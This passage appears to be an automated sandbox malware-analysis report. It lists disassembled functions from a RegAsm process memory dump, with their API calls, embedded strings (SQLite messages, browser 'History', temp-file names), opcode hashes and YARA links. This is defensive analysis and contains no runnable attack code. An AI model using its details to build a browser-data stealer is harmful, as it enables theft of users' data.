                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4131475296-0
                                                                                                                                                                                • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFilefreememset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2507021081-0
                                                                                                                                                                                • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                • free.MSVCRT ref: 00417544
                                                                                                                                                                                • free.MSVCRT ref: 00417562
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4131324427-0
                                                                                                                                                                                • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                                                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                                                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                • free.MSVCRT ref: 0041822B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PathTemp$free
                                                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                • API String ID: 924794160-1420421710
                                                                                                                                                                                • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                                                                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                • API String ID: 0-1953309616
                                                                                                                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@$free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2241099983-0
                                                                                                                                                                                • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                • free.MSVCRT ref: 004174E4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4053608372-0
                                                                                                                                                                                • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                                                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                                                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1471605966-0
                                                                                                                                                                                • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                • String ID: \StringFileInfo\
                                                                                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memicmpwcslen
                                                                                                                                                                                • String ID: @@@@$History
                                                                                                                                                                                • API String ID: 1872909662-685208920
                                                                                                                                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
